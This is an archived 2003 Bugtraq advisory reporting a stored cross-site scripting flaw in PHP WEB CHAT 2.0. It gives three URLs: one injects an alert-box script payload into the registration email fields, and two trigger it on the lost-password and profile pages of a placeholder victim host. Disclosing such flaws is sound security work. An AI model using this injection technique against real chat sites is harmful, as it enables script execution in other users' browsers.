Home page logo
/

bugtraq logo Bugtraq mailing list archives

CSS in PHP WEB CHAT
From: "Over_G" <overg () mail ru>
Date: Tue, 25 Mar 2003 12:11:24 +0300

Product: PHP WEB CHAT
Version: 2.0
OffSite: http://www.webscriptworld.com
Problem: Cross Site Scripting
--------------------------------------------


Actions:

1)Register
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scr*pt>alert%20("Test!")</scr*pt>&email1=<scr*pt>alert%20("Test!")</scr*pt>

2)To return the lost password and CSS is carried out (email)
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG

3)View profile (email1)
http://[victim]/chat_dir/profile.php?username=OverG




Contacts: www.overg.com www.dwcgr0up.com
          irc.zaingandol.org #DWC
          ogprog () ukr net


Best regards, Over G[DWC Gr0up]


P.S. Sorry for my English :)


  By Date           By Thread  

Current thread:
  • CSS in PHP WEB CHAT Over_G (Mar 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]